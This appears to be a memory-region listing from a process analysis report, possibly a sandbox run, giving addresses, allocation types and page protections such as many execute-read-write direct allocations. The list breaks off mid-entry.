23FA0000
|
trusted library allocation
|
page read and write
|
||
2242E000
|
stack
|
page read and write
|
||
BB21000
|
direct allocation
|
page execute and read and write
|
||
B017000
|
direct allocation
|
page execute and read and write
|
||
AFB5000
|
direct allocation
|
page execute and read and write
|
||
AE55000
|
direct allocation
|
page execute and read and write
|
||
B946000
|
direct allocation
|
page execute and read and write
|
||
22600000
|
remote allocation
|
page read and write
|
||
BE3D000
|
direct allocation
|
page execute and read and write
|
||
B2B3000
|
direct allocation
|
page execute and read and write
|
||
BD20000
|
direct allocation
|
page execute and read and write
|
||
B455000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AB96000
|
direct allocation
|
page execute and read and write
|
||
24DD0000
|
trusted library allocation
|
page read and write
|
||
BCAD000
|
direct allocation
|
page execute and read and write
|
||
610000
|
heap
|
page read and write
|
||
ADAA000
|
direct allocation
|
page execute and read and write
|
||
B95B000
|
direct allocation
|
page execute and read and write
|
||
21FA7000
|
trusted library allocation
|
page read and write
|
||
527D000
|
stack
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B89C000
|
direct allocation
|
page execute and read and write
|
||
23C1C000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AFE5000
|
direct allocation
|
page execute and read and write
|
||
B90C000
|
direct allocation
|
page execute and read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
ACEC000
|
direct allocation
|
page execute and read and write
|
||
2F70000
|
trusted library section
|
page read and write
|
||
710B000
|
heap
|
page read and write
|
||
9EC000
|
stack
|
page read and write
|
||
B373000
|
direct allocation
|
page execute and read and write
|
||
B0A5000
|
direct allocation
|
page execute and read and write
|
||
788E000
|
heap
|
page read and write
|
||
8820000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
BF17000
|
direct allocation
|
page execute and read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
BD46000
|
direct allocation
|
page execute and read and write
|
||
223EC000
|
stack
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B805000
|
direct allocation
|
page execute and read and write
|
||
AFAA000
|
direct allocation
|
page execute and read and write
|
||
3038000
|
stack
|
page read and write
|
||
24304000
|
heap
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B0CD000
|
direct allocation
|
page execute and read and write
|
||
B85B000
|
direct allocation
|
page execute and read and write
|
||
BE1F000
|
direct allocation
|
page execute and read and write
|
||
BE76000
|
direct allocation
|
page execute and read and write
|
||
B31D000
|
direct allocation
|
page execute and read and write
|
||
AFFE000
|
direct allocation
|
page execute and read and write
|
||
B8D2000
|
direct allocation
|
page execute and read and write
|
||
B0BC000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24AB0000
|
heap
|
page read and write
|
||
B267000
|
direct allocation
|
page execute and read and write
|
||
AC3C000
|
direct allocation
|
page execute and read and write
|
||
B013000
|
direct allocation
|
page execute and read and write
|
||
ACE9000
|
direct allocation
|
page execute and read and write
|
||
BA71000
|
direct allocation
|
page execute and read and write
|
||
7040000
|
heap
|
page read and write
|
||
22F9D000
|
trusted library allocation
|
page read and write
|
||
B6D1000
|
direct allocation
|
page execute and read and write
|
||
BCFC000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
B1FC000
|
direct allocation
|
page execute and read and write
|
||
5A7000
|
trusted library allocation
|
page execute and read and write
|
||
AA9A000
|
direct allocation
|
page execute and read and write
|
||
B293000
|
direct allocation
|
page execute and read and write
|
||
7503000
|
heap
|
page read and write
|
||
21ED5000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
257E0000
|
trusted library allocation
|
page read and write
|
||
AFE3000
|
direct allocation
|
page execute and read and write
|
||
A83F000
|
direct allocation
|
page execute and read and write
|
||
2FC2000
|
trusted library allocation
|
page read and write
|
||
B7B6000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B430000
|
direct allocation
|
page execute and read and write
|
||
AE42000
|
direct allocation
|
page execute and read and write
|
||
BDCB000
|
direct allocation
|
page execute and read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
BA73000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
64D0000
|
direct allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
BABE000
|
direct allocation
|
page execute and read and write
|
||
B5F6000
|
direct allocation
|
page execute and read and write
|
||
A7A3000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
23094000
|
trusted library allocation
|
page read and write
|
||
24D40000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
BED5000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B397000
|
direct allocation
|
page execute and read and write
|
||
6F1E000
|
stack
|
page read and write
|
||
B328000
|
direct allocation
|
page execute and read and write
|
||
B60F000
|
direct allocation
|
page execute and read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
76D0000
|
trusted library allocation
|
page read and write
|
||
BBFC000
|
direct allocation
|
page execute and read and write
|
||
ADBA000
|
direct allocation
|
page execute and read and write
|
||
B61E000
|
direct allocation
|
page execute and read and write
|
||
BD83000
|
direct allocation
|
page execute and read and write
|
||
2198D000
|
stack
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C90000
|
trusted library allocation
|
page read and write
|
||
6500000
|
direct allocation
|
page read and write
|
||
BCF4000
|
direct allocation
|
page execute and read and write
|
||
AF1B000
|
direct allocation
|
page execute and read and write
|
||
23A4A000
|
trusted library allocation
|
page read and write
|
||
240C0000
|
heap
|
page read and write
|
||
24D50000
|
trusted library allocation
|
page execute and read and write
|
||
8A15000
|
heap
|
page read and write
|
||
AEA9000
|
direct allocation
|
page execute and read and write
|
||
AE9B000
|
direct allocation
|
page execute and read and write
|
||
B7C9000
|
direct allocation
|
page execute and read and write
|
||
AF58000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B20C000
|
direct allocation
|
page execute and read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
AE04000
|
direct allocation
|
page execute and read and write
|
||
BACA000
|
direct allocation
|
page execute and read and write
|
||
4EA1000
|
trusted library allocation
|
page read and write
|
||
B1C5000
|
direct allocation
|
page execute and read and write
|
||
7730000
|
heap
|
page read and write
|
||
BA41000
|
direct allocation
|
page execute and read and write
|
||
B894000
|
direct allocation
|
page execute and read and write
|
||
BD38000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
755B000
|
heap
|
page read and write
|
||
B3B8000
|
direct allocation
|
page execute and read and write
|
||
239FE000
|
trusted library allocation
|
page read and write
|
||
BAD1000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
6E47000
|
heap
|
page read and write
|
||
8780000
|
heap
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
BBD0000
|
direct allocation
|
page execute and read and write
|
||
21DD0000
|
trusted library allocation
|
page read and write
|
||
B25C000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B716000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
ADF6000
|
direct allocation
|
page execute and read and write
|
||
BC90000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
BA8D000
|
direct allocation
|
page execute and read and write
|
||
B469000
|
direct allocation
|
page execute and read and write
|
||
B3C1000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B675000
|
direct allocation
|
page execute and read and write
|
||
21C9B000
|
stack
|
page read and write
|
||
B742000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B2E7000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B8DC000
|
direct allocation
|
page execute and read and write
|
||
22DF1000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
A80C000
|
direct allocation
|
page execute and read and write
|
||
B80E000
|
direct allocation
|
page execute and read and write
|
||
8CD0000
|
trusted library allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24D20000
|
trusted library allocation
|
page read and write
|
||
2190E000
|
stack
|
page read and write
|
||
B5C1000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B836000
|
direct allocation
|
page execute and read and write
|
||
ABF6000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
3420000
|
trusted library allocation
|
page read and write
|
||
63D8000
|
trusted library allocation
|
page read and write
|
||
ACD6000
|
direct allocation
|
page execute and read and write
|
||
6046000
|
trusted library allocation
|
page read and write
|
||
70FE000
|
heap
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
ACC9000
|
direct allocation
|
page execute and read and write
|
||
2503E000
|
stack
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B8FB000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
B1A4000
|
direct allocation
|
page execute and read and write
|
||
BC86000
|
direct allocation
|
page execute and read and write
|
||
B144000
|
direct allocation
|
page execute and read and write
|
||
A9C1000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BC64000
|
direct allocation
|
page execute and read and write
|
||
B2E0000
|
direct allocation
|
page execute and read and write
|
||
BC76000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BEDE000
|
direct allocation
|
page execute and read and write
|
||
245EE000
|
stack
|
page read and write
|
||
3490000
|
trusted library allocation
|
page execute and read and write
|
||
256DF000
|
trusted library allocation
|
page read and write
|
||
B798000
|
direct allocation
|
page execute and read and write
|
||
B49E000
|
direct allocation
|
page execute and read and write
|
||
BA05000
|
direct allocation
|
page execute and read and write
|
||
B93A000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA69000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
22974000
|
trusted library allocation
|
page read and write
|
||
229BC000
|
trusted library allocation
|
page read and write
|
||
70FD000
|
heap
|
page read and write
|
||
AC1B000
|
direct allocation
|
page execute and read and write
|
||
BA53000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
A7DB000
|
direct allocation
|
page execute and read and write
|
||
51C000
|
heap
|
page read and write
|
||
6570000
|
heap
|
page read and write
|
||
ACC7000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BB61000
|
direct allocation
|
page execute and read and write
|
||
ADDE000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
590000
|
trusted library allocation
|
page read and write
|
||
B829000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B9AA000
|
direct allocation
|
page execute and read and write
|
||
22C9E000
|
trusted library allocation
|
page read and write
|
||
BD84000
|
direct allocation
|
page execute and read and write
|
||
22C9A000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AE68000
|
direct allocation
|
page execute and read and write
|
||
B1D9000
|
direct allocation
|
page execute and read and write
|
||
B5A5000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
B254000
|
direct allocation
|
page execute and read and write
|
||
BCF0000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BF77000
|
direct allocation
|
page execute and read and write
|
||
B067000
|
direct allocation
|
page execute and read and write
|
||
22FF3000
|
trusted library allocation
|
page read and write
|
||
B581000
|
direct allocation
|
page execute and read and write
|
||
24C90000
|
trusted library allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
A9EB000
|
direct allocation
|
page execute and read and write
|
||
BA01000
|
direct allocation
|
page execute and read and write
|
||
B1B6000
|
direct allocation
|
page execute and read and write
|
||
21E67000
|
trusted library allocation
|
page read and write
|
||
AF3C000
|
direct allocation
|
page execute and read and write
|
||
21EF8000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B2F3000
|
direct allocation
|
page execute and read and write
|
||
B056000
|
direct allocation
|
page execute and read and write
|
||
52D0000
|
direct allocation
|
page read and write
|
||
BCAB000
|
direct allocation
|
page execute and read and write
|
||
B8DE000
|
direct allocation
|
page execute and read and write
|
||
B8CB000
|
direct allocation
|
page execute and read and write
|
||
ADE8000
|
direct allocation
|
page execute and read and write
|
||
B35E000
|
direct allocation
|
page execute and read and write
|
||
B2F5000
|
direct allocation
|
page execute and read and write
|
||
B1E9000
|
direct allocation
|
page execute and read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
BE91000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
84C2000
|
heap
|
page read and write
|
||
B01D000
|
direct allocation
|
page execute and read and write
|
||
B6AE000
|
direct allocation
|
page execute and read and write
|
||
B83C000
|
direct allocation
|
page execute and read and write
|
||
BD07000
|
direct allocation
|
page execute and read and write
|
||
52F0000
|
direct allocation
|
page read and write
|
||
B69D000
|
direct allocation
|
page execute and read and write
|
||
BA27000
|
direct allocation
|
page execute and read and write
|
||
BDF0000
|
direct allocation
|
page execute and read and write
|
||
B4CF000
|
direct allocation
|
page execute and read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
240BD000
|
trusted library allocation
|
page read and write
|
||
BC9B000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B856000
|
direct allocation
|
page execute and read and write
|
||
B425000
|
direct allocation
|
page execute and read and write
|
||
8C60000
|
trusted library allocation
|
page read and write
|
||
B14C000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
AE3E000
|
direct allocation
|
page execute and read and write
|
||
8435000
|
trusted library allocation
|
page read and write
|
||
ADA4000
|
direct allocation
|
page execute and read and write
|
||
B384000
|
direct allocation
|
page execute and read and write
|
||
ADD6000
|
direct allocation
|
page execute and read and write
|
||
B5A9000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
BA09000
|
direct allocation
|
page execute and read and write
|
||
B097000
|
direct allocation
|
page execute and read and write
|
||
B5C3000
|
direct allocation
|
page execute and read and write
|
||
BFC4000
|
direct allocation
|
page execute and read and write
|
||
6F00000
|
direct allocation
|
page read and write
|
||
22179000
|
trusted library allocation
|
page read and write
|
||
21F72000
|
trusted library allocation
|
page read and write
|
||
BEF1000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BBE0000
|
direct allocation
|
page execute and read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
B6B9000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
6646000
|
heap
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B5A0000
|
direct allocation
|
page execute and read and write
|
||
B01F000
|
direct allocation
|
page execute and read and write
|
||
25710000
|
trusted library allocation
|
page execute and read and write
|
||
BC8B000
|
direct allocation
|
page execute and read and write
|
||
22F0A000
|
trusted library allocation
|
page read and write
|
||
83F0000
|
trusted library allocation
|
page execute and read and write
|
||
228B6000
|
trusted library allocation
|
page read and write
|
||
ADBD000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
84A4000
|
heap
|
page read and write
|
||
B89A000
|
direct allocation
|
page execute and read and write
|
||
BA59000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
21C2F000
|
stack
|
page read and write
|
||
3220000
|
trusted library allocation
|
page read and write
|
||
B48C000
|
direct allocation
|
page execute and read and write
|
||
BDD1000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BDAD000
|
direct allocation
|
page execute and read and write
|
||
224DE000
|
stack
|
page read and write
|
||
B6D9000
|
direct allocation
|
page execute and read and write
|
||
B13C000
|
direct allocation
|
page execute and read and write
|
||
2263E000
|
stack
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
AEEA000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
ADE2000
|
direct allocation
|
page execute and read and write
|
||
256F0000
|
trusted library allocation
|
page execute and read and write
|
||
B675000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BBFA000
|
direct allocation
|
page execute and read and write
|
||
B48A000
|
direct allocation
|
page execute and read and write
|
||
78CB000
|
heap
|
page read and write
|
||
AF69000
|
direct allocation
|
page execute and read and write
|
||
B842000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
3148000
|
trusted library allocation
|
page read and write
|
||
C010000
|
direct allocation
|
page execute and read and write
|
||
230A7000
|
trusted library allocation
|
page read and write
|
||
AF3A000
|
direct allocation
|
page execute and read and write
|
||
AF9F000
|
direct allocation
|
page execute and read and write
|
||
B28F000
|
direct allocation
|
page execute and read and write
|
||
BADC000
|
direct allocation
|
page execute and read and write
|
||
24EED000
|
stack
|
page read and write
|
||
B575000
|
direct allocation
|
page execute and read and write
|
||
23112000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B4EE000
|
direct allocation
|
page execute and read and write
|
||
B882000
|
direct allocation
|
page execute and read and write
|
||
AFCA000
|
direct allocation
|
page execute and read and write
|
||
AE91000
|
direct allocation
|
page execute and read and write
|
||
B010000
|
direct allocation
|
page execute and read and write
|
||
B844000
|
direct allocation
|
page execute and read and write
|
||
ADC3000
|
direct allocation
|
page execute and read and write
|
||
B008000
|
direct allocation
|
page execute and read and write
|
||
B5EA000
|
direct allocation
|
page execute and read and write
|
||
4E5B000
|
stack
|
page read and write
|
||
BA14000
|
direct allocation
|
page execute and read and write
|
||
8840000
|
trusted library allocation
|
page read and write
|
||
22ECE000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BAC8000
|
direct allocation
|
page execute and read and write
|
||
B9D3000
|
direct allocation
|
page execute and read and write
|
||
7827000
|
trusted library allocation
|
page read and write
|
||
A825000
|
direct allocation
|
page execute and read and write
|
||
B375000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
22C06000
|
trusted library allocation
|
page read and write
|
||
B7BD000
|
direct allocation
|
page execute and read and write
|
||
AF7D000
|
direct allocation
|
page execute and read and write
|
||
B566000
|
direct allocation
|
page execute and read and write
|
||
21BEE000
|
stack
|
page read and write
|
||
23ABD000
|
trusted library allocation
|
page read and write
|
||
BFAB000
|
direct allocation
|
page execute and read and write
|
||
BE0C000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B272000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
515E000
|
stack
|
page read and write
|
||
8330000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
220E5000
|
trusted library allocation
|
page read and write
|
||
BE93000
|
direct allocation
|
page execute and read and write
|
||
B5D1000
|
direct allocation
|
page execute and read and write
|
||
BC94000
|
direct allocation
|
page execute and read and write
|
||
B0EC000
|
direct allocation
|
page execute and read and write
|
||
21CF0000
|
heap
|
page read and write
|
||
94CA000
|
stack
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
BECA000
|
direct allocation
|
page execute and read and write
|
||
BE23000
|
direct allocation
|
page execute and read and write
|
||
446000
|
unkown
|
page readonly
|
||
AFC2000
|
direct allocation
|
page execute and read and write
|
||
B646000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
AE07000
|
direct allocation
|
page execute and read and write
|
||
31CE000
|
stack
|
page read and write
|
||
BD76000
|
direct allocation
|
page execute and read and write
|
||
BA0D000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AE7B000
|
direct allocation
|
page execute and read and write
|
||
B673000
|
direct allocation
|
page execute and read and write
|
||
3170000
|
trusted library section
|
page read and write
|
||
ADEA000
|
direct allocation
|
page execute and read and write
|
||
6371000
|
trusted library allocation
|
page read and write
|
||
AB1A000
|
direct allocation
|
page execute and read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
BA18000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
B002000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B3DB000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
ADD4000
|
direct allocation
|
page execute and read and write
|
||
BD0D000
|
direct allocation
|
page execute and read and write
|
||
24B60000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AF01000
|
direct allocation
|
page execute and read and write
|
||
AE32000
|
direct allocation
|
page execute and read and write
|
||
B3D6000
|
direct allocation
|
page execute and read and write
|
||
BCE8000
|
direct allocation
|
page execute and read and write
|
||
AC84000
|
direct allocation
|
page execute and read and write
|
||
344A000
|
trusted library allocation
|
page execute and read and write
|
||
9700000
|
direct allocation
|
page execute and read and write
|
||
BB4A000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
AEE3000
|
direct allocation
|
page execute and read and write
|
||
B647000
|
direct allocation
|
page execute and read and write
|
||
B7C7000
|
direct allocation
|
page execute and read and write
|
||
AEFD000
|
direct allocation
|
page execute and read and write
|
||
B4CB000
|
direct allocation
|
page execute and read and write
|
||
B0F9000
|
direct allocation
|
page execute and read and write
|
||
B158000
|
direct allocation
|
page execute and read and write
|
||
B905000
|
direct allocation
|
page execute and read and write
|
||
24304000
|
heap
|
page read and write
|
||
B60D000
|
direct allocation
|
page execute and read and write
|
||
B9E3000
|
direct allocation
|
page execute and read and write
|
||
BC32000
|
direct allocation
|
page execute and read and write
|
||
B7B8000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
B8DA000
|
direct allocation
|
page execute and read and write
|
||
ABEC000
|
direct allocation
|
page execute and read and write
|
||
BE4D000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B7DC000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
7390000
|
direct allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BB0F000
|
direct allocation
|
page execute and read and write
|
||
22AD2000
|
trusted library allocation
|
page read and write
|
||
24C08000
|
heap
|
page read and write
|
||
B423000
|
direct allocation
|
page execute and read and write
|
||
B18F000
|
direct allocation
|
page execute and read and write
|
||
22089000
|
trusted library allocation
|
page read and write
|
||
AD8F000
|
direct allocation
|
page execute and read and write
|
||
570000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23911000
|
trusted library allocation
|
page read and write
|
||
A5CC000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B6EB000
|
direct allocation
|
page execute and read and write
|
||
BE1D000
|
direct allocation
|
page execute and read and write
|
||
A690000
|
direct allocation
|
page execute and read and write
|
||
23915000
|
trusted library allocation
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
AE4A000
|
direct allocation
|
page execute and read and write
|
||
21FAB000
|
trusted library allocation
|
page read and write
|
||
AD87000
|
direct allocation
|
page execute and read and write
|
||
B137000
|
direct allocation
|
page execute and read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
BC50000
|
direct allocation
|
page execute and read and write
|
||
B4EA000
|
direct allocation
|
page execute and read and write
|
||
BCC6000
|
direct allocation
|
page execute and read and write
|
||
B31B000
|
direct allocation
|
page execute and read and write
|
||
B8F7000
|
direct allocation
|
page execute and read and write
|
||
AD75000
|
direct allocation
|
page execute and read and write
|
||
B395000
|
direct allocation
|
page execute and read and write
|
||
B988000
|
direct allocation
|
page execute and read and write
|
||
8890000
|
trusted library allocation
|
page execute and read and write
|
||
B2FE000
|
direct allocation
|
page execute and read and write
|
||
2414E000
|
stack
|
page read and write
|
||
B082000
|
direct allocation
|
page execute and read and write
|
||
B479000
|
direct allocation
|
page execute and read and write
|
||
B8DE000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
5371000
|
trusted library allocation
|
page read and write
|
||
AEC8000
|
direct allocation
|
page execute and read and write
|
||
B1FF000
|
direct allocation
|
page execute and read and write
|
||
78D3000
|
heap
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B451000
|
direct allocation
|
page execute and read and write
|
||
22F2A000
|
trusted library allocation
|
page read and write
|
||
B282000
|
direct allocation
|
page execute and read and write
|
||
6F60000
|
direct allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B0FE000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
4730000
|
remote allocation
|
page execute and read and write
|
||
7870000
|
trusted library allocation
|
page read and write
|
||
2569E000
|
stack
|
page read and write
|
||
BA25000
|
direct allocation
|
page execute and read and write
|
||
B594000
|
direct allocation
|
page execute and read and write
|
||
AB18000
|
direct allocation
|
page execute and read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
AFA8000
|
direct allocation
|
page execute and read and write
|
||
AF5A000
|
direct allocation
|
page execute and read and write
|
||
ACC0000
|
direct allocation
|
page execute and read and write
|
||
21C50000
|
direct allocation
|
page read and write
|
||
AF70000
|
direct allocation
|
page execute and read and write
|
||
7109000
|
heap
|
page read and write
|
||
B197000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
A6A3000
|
direct allocation
|
page execute and read and write
|
||
B3FD000
|
direct allocation
|
page execute and read and write
|
||
B2B5000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
ABB7000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page execute and read and write
|
||
A66E000
|
direct allocation
|
page execute and read and write
|
||
220DD000
|
trusted library allocation
|
page read and write
|
||
2DFC000
|
stack
|
page read and write
|
||
B124000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
442000
|
unkown
|
page readonly
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B2E5000
|
direct allocation
|
page execute and read and write
|
||
B5C4000
|
direct allocation
|
page execute and read and write
|
||
BCA5000
|
direct allocation
|
page execute and read and write
|
||
6E45000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BBCE000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
352E000
|
stack
|
page read and write
|
||
24AA6000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
23939000
|
trusted library allocation
|
page read and write
|
||
22AA1000
|
trusted library allocation
|
page read and write
|
||
2270000
|
heap
|
page read and write
|
||
B199000
|
direct allocation
|
page execute and read and write
|
||
B440000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B3F5000
|
direct allocation
|
page execute and read and write
|
||
24302000
|
heap
|
page read and write
|
||
BC26000
|
direct allocation
|
page execute and read and write
|
||
BDF9000
|
direct allocation
|
